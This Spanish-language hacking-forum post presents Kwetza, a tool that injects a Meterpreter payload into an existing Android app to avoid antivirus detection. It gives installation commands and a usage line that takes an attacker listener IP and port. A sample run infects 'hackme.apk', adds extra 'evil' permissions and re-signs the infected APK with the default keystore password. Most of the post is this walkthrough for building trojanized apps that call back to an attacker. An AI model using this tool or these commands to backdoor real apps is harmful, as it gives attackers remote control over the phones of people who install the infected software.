Kwetza - Inyecta Payloads en Aplicaciones Android

Iniciado por ANTRAX, Julio 17, 2017, 12:08:55 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.


Kwetza es una herramienta que le permite infectar una aplicación Android existente con un payload Meterpreter.

¿Qué hace?

Kwetza infecta una aplicación Android existente con plantillas de payloads personalizadas o predeterminadas para evitar la detección por antivirus. Kwetza te permite infectar las aplicaciones de Android utilizando los permisos predeterminados de la aplicación de destino o inyectar permisos adicionales para obtener funcionalidad adicional.

Instalación

Código: bash
git clone https://github.com/sensepost/kwetza.git


Kwetza está escrito en Python y requiere BeautifulSoup que se puede instalar usando Pip:

Código: bash
pip install beautifulsoup4


Kwetza requiere que Apktool sea instalado y accesible a través de su PATH. Esto se puede configurar usando las instrucciones de instalación que se encuentran aquí: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Modo de uso:

Código: bash
python kwetza.py nameOfTheApkToInfect.apk LHOST LPORT yes/no


    nameOfTheApkToInfect.apk =name of the APK you wish to infect.
    LHOST =IP of your listener.
    LPORT =Port of your listener.
    yes =include "yes" to inject additional evil perms into the app, "no" to utilize the default permissions of the app.

python No tienes permitido ver los links. Registrarse o Entrar a mi cuenta hackme.apk 10.42.0.118 4444 yes

Código: text
[+] MMMMMM KWETZA
[*] DECOMPILING TARGET APK

[+] ENDPOINT IP: 10.42.0.118
[+] ENDPOINT PORT: 4444
[+] APKTOOL DECOMPILED SUCCESS

[*] BYTING COMMS...

[*] ANALYZING ANDROID MANIFEST...

[+] TARGET ACTIVITY: com.foo.moo.gui.MainActivity

[*] INJECTION INTO APK

[+] CHECKING IF ADDITIONAL PERMS TO BE ADDED
[*] INJECTION OF CRAZY PERMS TO BE DONE!
[+] TIME TO BUILD INFECTED APK

[*] EXECUTING APKTOOL BUILD COMMAND

[+] BUILD RESULT

############################################

I: Using APktool 2.2.0

I: Checking whether source shas changed...
I: Smaling smali folder into classes.dex
I: Checking whether resources has changed...
I: Building resources...
I: Copying libs ...(/lib)
I: Building apk file...
I: Copying unknown files/dir...

###########################################

[*] EXECUTING JARSIGNER COMMAND...

Enter Passphrase for keystore: password

[+] JARSIGNER RESULT

###########################################

jar signed.

###########################################

[+] L00t located at hackme/dist/hackme.apk


Información

Kwetza ha sido desarrollado para trabajar con Python 2.
Kwetza usará por defecto la plantilla y el keystore ubicados en la carpeta "payload" para inyectar y firmar el apk infectado.
Si desea firmar la aplicación infectada con su propio certificado, genere un nuevo keystore y colóquelo en la carpeta "payload" y cambie el nombre al keystore existente o cambie la referencia en No tienes permitido ver los links. Registrarse o Entrar a mi cuenta.
Lo mismo se puede hacer para las plantillas de payload.
La contraseña para el keystore predeterminado es, "password".

Descarga: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta